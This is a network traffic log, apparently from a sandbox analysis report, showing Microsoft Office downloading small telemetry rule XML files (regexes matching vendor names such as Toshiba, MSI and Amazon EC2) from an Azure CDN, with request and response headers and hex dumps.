                                                                                2024-10-04 09:33:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                37192.168.2.55541213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:56 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 420
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                x-ms-request-id: a7623418-001e-00a2-348c-15d4d5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc552g4w83buhsr3htc0000000cdg000000002cf3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                38192.168.2.55541613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:56 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 423
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                x-ms-request-id: bb2e28bd-501e-0016-0b8c-15181b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55d6fcl6x6bw8cpdc0000000c90000000003nsb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                39192.168.2.55542113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:57 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 479
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                ETag: "0x8DC582BB7D702D0"
                                                                                x-ms-request-id: 772ea1ab-e01e-003c-188c-15c70b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55sdcjq8ksxt4n9mc00000001sg000000000655
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                40192.168.2.55542013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:57 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 400
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                ETag: "0x8DC582BB2D62837"
                                                                                x-ms-request-id: 9bed673a-001e-0046-278c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55lghvzbxktxfqntw0000000bzg00000000855q
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                41192.168.2.55541813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:57 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                ETag: "0x8DC582BB046B576"
                                                                                x-ms-request-id: 8789ddbb-a01e-0084-6a8c-159ccd000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55whfstvfw43u8fp40000000cf0000000005nx7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                42192.168.2.55541913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:57 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 404
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                x-ms-request-id: 0dcb6c6d-e01e-0003-668c-150fa8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55v7j95gq2uzq37a00000000cmg000000003hpw
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                43192.168.2.55541713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:57 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 478
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                ETag: "0x8DC582B9B233827"
                                                                                x-ms-request-id: 4da5bf60-a01e-0070-668c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009bw4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                44192.168.2.55542213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:58 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 425
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                ETag: "0x8DC582BBA25094F"
                                                                                x-ms-request-id: 3a0dcc46-601e-0032-6c8c-15eebb000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc554l9xf959gp9cb1s00000006g0000000005nwp
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                45192.168.2.55542313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:58 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 475
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                x-ms-request-id: 15fe0b87-a01e-0002-3b8c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc55v7j95gq2uzq37a00000000chg000000005vr2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                46192.168.2.55542413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:58 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 448
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB389F49B"
                                                                                x-ms-request-id: 1f480944-c01e-002b-018c-156e00000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc55sdcjq8ksxt4n9mc00000001n0000000006wsx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                47192.168.2.55542913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:58 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 491
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B98B88612"
                                                                                x-ms-request-id: c54fbac1-901e-008f-588c-1567a6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55d6fcl6x6bw8cpdc0000000cb0000000000q0g
                                                                                x-fd-int-roxy-purgeid: 0
